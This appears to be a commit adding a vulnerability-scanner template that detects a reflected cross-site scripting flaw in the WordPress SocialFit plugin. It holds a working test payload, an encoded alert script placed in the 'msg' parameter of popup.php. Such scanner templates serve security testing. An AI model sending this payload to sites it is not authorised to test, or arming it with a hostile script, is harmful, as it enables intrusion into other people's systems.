Create wp-socialfit-xss.yaml

vulnerabilities/wordpress/wp-socialfit-xss.yaml

@@ -0,0 +1,29 @@
+id: wp-socialfit-xss
+
+info:
+  name: WordPress Plugin SocialFit - 'msg' Cross-Site Scripting
+  author: daffainfo
+  severity: medium
+  description: |
+    SocialFit plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+  reference: |
+    - https://www.exploit-db.com/exploits/37481
+  tags: wordpress,xss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3Cscript%3Ealert%281%29%3C/script%3E'
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<script>alert(1)</script>'
+      - type: word
+        part: header
+        words:
+          - "text/html"
+      - type: status
+        status:
+          - 200